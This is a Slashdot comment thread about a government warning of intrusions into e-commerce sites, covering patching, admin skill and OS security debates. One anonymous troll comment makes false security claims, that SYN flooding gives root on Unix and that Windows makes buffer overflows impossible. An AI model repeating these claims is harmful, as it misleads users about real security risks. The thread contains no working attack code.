  • in .au you need a CC and ANY expiry date after today. Luckily, if you loose more than $50 you don't have to pay it. bwahahahahaha.. now that's funny, lots of luck trying to convince a bank that it wasn't you.
  • As sad as i may find it. The only machine i administrate that ever got `cracked` was a linux box. OK, I admit it, it wasn`t carefully secured and patched like it should be, but ... well ... if you`re a busy admin you haven`t always got the time to read bugtraq every day, and even if you have, the time to implement the fixes isn`t always availble.
    Anyway, my point, linux or windows or whatever OS you use doesn`t make the difference in being secure. It`s the admin who makes the difference.
    Keep a close eye on your machines, update them whenever needed, keep in touch with the `scene`.
    I personnaly tend to be `friends` with some of the more advanced scriptkiddies around, ok, they`re mostly idiots who haven`t got a clue, but they love to brag about their latest actions, and the latest exploits they have heard about... and if they know of any that affect you... you better start fixing ...
    now... you can`t get your machine to be 100% fool proof, but you can make it less inviting to script kiddies... use IDS, Firewalls, secure your machines, make sure that you log remotely, secure those logs, ... have backups, have `honey pots` to keep an occiasonal script kiddie busy instead of attacking your secure production servers ... and most of all ... take action against every attack attempt ... warn the isp and upstream provider of anyone who`s doing something funny on your network etc ...
    Security is hard work ... and most e-commerce companies don`t get it ... they prefer to take an easy ride to fame and money ... rather then spend some time and money creating a good solution.
    now this doesn`t only show in security, mostly the entire infrastructure of e-commerce sites is CRAP to say the least.

  • mod this up (Score:1)

    by Anonymous Coward
    Unix is so full of security holes that all you have to do is run a service as root, and sync flood the server to death and voila! Instant Root access for the hacker.

    Under Windows you can run as many services as you like and even log in as administrator and the OS is still secure.

    Windows virutal memory is an object, not a file and it has advanced security audits that make buffer overlfows impossible.

    Unix is so obssesed with compatibility that no one has ever really even bothered to write a procted memory buffer that is object oriented. Oh wait! C++ is for wussies in the unix world. Its just btter to rewriute the wheel. So I guess its impossible to write an NT style buffer object in Unix! At least dekstops like gnome are written in c++. Oh ya. Whatever

    Go 30 year technology1
  • An estimated 80% of the cc transactions originating in this country are with stolen cc numbers. So, if you have online cc processing on your site, MAKE SURE you block any requests originating with 202.*

    Hey! All the IP addresses where I work start with 202, and I'm fairly sure that New Zealand isn't the country in Southeast Asia you're referring to. I don't think that IP address is a very good way of determining geographical location, and I don't think geographical location is a good way of determining guilt.

  • One of the main reasons that EFNET is unused is because it has no chanserv/nickserv features and is therefore unusable, as it is far too easy to hack around with

    Contrast this to DALnet, which has teams of volunteers patrolling it and features allowing reliable and secure operation of room and servers. Just because EFNET was there first doesn't mean it should be revered. DALnet is still very much run by the geeks (hence dal.net [dal.net] not dalnet.com, iyswim.

    Like it or not, the web is a much bigger place than it used to be. This kind of harking back to "the good old days" won't help preserve the distributed, open and hackable (in the good sense) nature of this beast we created. If a service, site or protocol is unreliable and not very viable for its intended purpose, it will die, nostalgia or not. We can only hope this is totally true and MS doesn't prove the exception with SQL et al.

    Ben^3
  • From the article:
    The majority of the intrusions have occurred on Microsoft Windows NT systems, although Unix based operating systems have been victimized as well. The hackers are exploiting at least three known system vulnerabilities to gain unauthorized access and download
    propriety information.
    What was the propriety info that was downloaded? Was it info about the propriety of cracking e-commerce sites?
    Also, the article goes on to cite three old Microsoft exploits. Where's the promised Unix vulnerability? I'm not saying Unix doesn't have exploits, only that this article says "Unix based operating systems have been victimized as well" and fails to explain.
    Anyhow, I fail to see why this is a "National Infrastructure" issue. Some greedy fools slapped together a website with Microsoft "solutions" and got hacked. If customers care, the market will reward sites with better security. If customers don't care, why should the government?
    I think this "nipc" is trying to create a pseudo-crisis to make themselves look relevant. Oldest trick in the governmental book.
  • I wonder how they defend against an attack from multiple machines without refusing new connections or RST'ing the wrong ones?

    From my experience of load testing NT4 boxes, it refuses new connections, basically.

  • In some environments, patching IS difficult. This can happen both cause of politics (eg. managers who'd rather take the risk of being insecure than the downtime involved in maintenance, as insane as that sounds), and because validation testing is a big deal on business-critical systems. If the patch breaks your box or your home-grown (and potentially broken) application code, it's as good as a DoS. It's also the case that amongst said managers, the level of security knowledge is SO low, the idea of "best practices" is totally alien. If they do get owned, they can defend themselves by weasling because their peers don't know any better. IMO, it's not so much that companies see security as a luxury, as they see it as being largely unimportant to the bottom line (again, as insane as that sounds). As you accurately pointed out, security is not a procedure, it's a mindset. There are lots of corporate managers out there who are still in the mindset of "keep doing what I think makes money, no matter how much those techies scream about security or anything else." Most cracks can be prevented. Many managers don't care. It's not always the case that admins don't know better.
  • I dont think that the problem lies with bigger and badder vulnerabilities, it lies with the fact that the people who are admin'ing these servers have not paid their dues properly.

    Hear me out on this one.

    The industry has been so cheapened by the fact that any yahoo that can read a book can pass an MCSE exam and get a 70k/yr job doing admin work on so-called "high-end" NT servers. When in reality this is like sending a kid who just got his driver's license at 16 to run the Indy 500. No driver's license or MCSE certificate can substitute for real world experience at the helm.

    And that comes out over time when you have inexperienced people out there. Common, fairly simple bugs and holes which come about through the normal life of software, become more serious when you don't have people with experience to handle them properly and do simple things like, say, remove the default configuration on software that is wide open like wu-ftpd and IIS. (Not to pick on any OS in particular, there)

    I think the NIPC warning just signifies from them what most of us (/.'ers and the like) have known for quite some time, that vulnerabilities are more serious when you don't have qualified people to take care of them

  • A few years ago there were no e-commerce sites. Now there are lots. And some of them run on operating systems (both windows and Unix) that have known security holes. It's obvious that hacker (cracker, whatever) actitivity is going to increase, since a few years ago there was a lot less to try and crack. Duh!
  • Here's your e-mail security notice of the day...

    Please install trojaniZed_update.yadda.yadda.yadda.tar.gz
    it fixes a really nasty exploit.
    Have a nice day.

Slashdot Top Deals

It is easier to write an incorrect program than understand a correct one.

Close